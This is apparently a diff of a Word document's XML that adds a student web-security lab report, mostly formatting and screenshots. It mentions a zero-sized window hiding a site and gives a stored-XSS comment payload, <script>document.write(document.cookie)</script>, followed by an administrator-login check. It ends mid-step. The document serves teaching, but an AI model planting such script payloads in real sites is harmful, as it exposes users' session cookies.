+        <w:rPr>
+          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">it don’t display </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">today.hit.edu.cn , because the size of the window had been set to </w:t>
+      </w:r>
+      <w:r>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="10">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>171450</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>652780</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="4908550" cy="2760345"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="11" name="Image9" descr=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="11" name="Image9" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId13"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4908550" cy="2760345"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>z</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>ero</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -2196,60 +2727,1749 @@
           <w:numId w:val="2"/>
         </w:numPr>
         <w:spacing w:before="240" w:after="0"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>利用存储式跨站漏洞窃取用户</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>cookie</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Use persistent XSS to session cookies</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">leave comments to the site, add statement: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>&lt;script&gt;document.write(document.cookie)&lt;/script&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="11">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>-24130</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>258445</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="5352415" cy="3011170"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="12" name="Image10" descr=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="12" name="Image10" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId14"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5352415" cy="3011170"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>the result is :</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="12">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>29210</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>147320</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="5245735" cy="2950845"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="13" name="Image11" descr=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="13" name="Image11" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId15"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5245735" cy="2950845"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>Administrator login and check what is different</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="14">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>181610</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>65405</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="5144135" cy="2893695"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="14" name="Image13" descr=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="14" name="Image13" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId16"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5144135" cy="2893695"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">add comments containing: </w:t>
+      </w:r>
+      <w:r>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="13">
+            <wp:simplePos x="0" y="0"/>
